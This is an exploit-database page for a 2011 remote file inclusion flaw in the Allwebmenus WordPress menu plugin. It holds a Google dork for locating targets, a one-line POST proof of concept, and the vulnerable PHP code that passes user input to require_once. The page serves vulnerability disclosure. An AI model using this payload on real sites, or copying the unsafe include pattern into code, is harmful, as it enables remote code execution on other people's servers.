header-logo
Suggest Exploit
vendor:
Allwebmenus Wordpress Menu Plugin
by:
Ben Schmidt
9.3
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Allwebmenus Wordpress Menu Plugin
Affected Version From: 1.1.2003
Affected Version To: 1.1.2003
Patch Exists: YES
Related CWE: N/A
CPE: a:allwebmenus:allwebmenus_wordpress_menu_plugin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2011

Allwebmenus WordPress Menu Plugin WordPress plugin RFI

Allwebmenus Wordpress Menu Plugin is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'abspath' parameter. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the plugin.
Source

Exploit-DB raw data:

# Exploit Title: Allwebmenus Wordpress Menu Plugin Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/allwebmenus-wordpress-menu-plugin
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/download/
# Version: 1.1.3 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php POST="abspath=RFI"

---
Vulnerable Code
---
/** Loads the WordPress Environment and Template */
if (!isset($_POST["abspath"]))
    die();
require_once(urldecode((string) $_POST["abspath"].'wp-blog-header.php'));

Navigation

Suggest Exploit

Services By CQR